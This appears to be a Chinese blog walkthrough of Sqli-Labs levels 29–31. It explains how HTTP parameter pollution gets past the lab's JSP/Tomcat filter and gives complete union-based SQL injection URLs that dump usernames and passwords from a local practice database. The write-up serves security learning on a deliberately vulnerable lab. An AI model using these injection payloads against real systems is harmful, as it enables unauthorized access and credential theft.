Sqli-Labs less29-31
Less-29
可以从介绍上看出,第29关被称为世界上最好的WAF,网上许多讲解的办法就是和第一关差不多,其实是不对的。
sqli-labs文件夹下面还有tomcat文件,这才是真正的less,里面的jspstudy需要搭建环境jspstudy:https://www.xp.cn/download.html
注意下载完之后可能出现阿帕奇端口冲突的情况,可以修改jspstudy的为8080,也要注意默认打开路径。
前置基础知识:
再补充一下服务器两层架构的知识:https://www.cnblogs.com/lcamry/p/5762961.html
29关的WAF:参数污染:jsp/tomcat使用getgetParameter("id")获取到的是第一个值,php/apache使用$_GET["id"]获取的是第二个值,那么第一个id纯数字,第二个id的值
也就是,需要注入两个参数,第二个参数才是可以实现sql注入的:下图图一是只有一个参数,图二是两个参数才可以
用两个参数绕过WAF之后,其他步骤和以前相同:直接最后一步
http://127.0.0.1:8080/sqli-labs/Less-29/index.jsp?id=1&&id=0' union select 1,2,(concat_ws(0x7e,username,password)) from security.users limit 3,1 --+
less-30
30关与29关基本一样,就是sql闭合变成了双引号:http://127.0.0.1:8080/sqli-labs/Less-30/?id=1&id=0" union select 1,2,(concat_ws(0x7e,username,password)) from security.users limit 3,1--+
less-31
31关也是类似,sql闭合变成了“)
http://127.0.0.1:8080/sqli-labs/Less-31/?id=1&id=0") union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+
最新文章
- iOS UITableViewController出现crash
- 配置recovery_min_apply_delay后重启standby节点报错:psql: FATAL: the database system is starting up
- bean标签
- splay学习笔记
- CSS实现文字竖排 DIV CSS文字垂直竖列排版显示如何实现?
- WPF与输入法冲突研究之二:汉字输入法会导致WPF程序的崩溃!
- 在cocos2d-x界面中嵌入Android的WebView
- 《自己动手写CPU》写书评获赠书活动结果
- Installshield设置feature为必须选中状态,即必定安装状态
- 【安卓手机通用】android adb shell 命令大全
- WPF之路五:wpf 隐藏与显示 Visibility
- C# 托管堆和垃圾回收器GC
- ios入门OC_UI晋级学什么?
- [译]PEP 380--子生成器的语法
- CSS属性相关
- python 当前时间获取方法
- javascript 词法结构小结
- Redis实现文章投票功能
- js 去除金额的千位分隔符
- 【Ruby】【变量】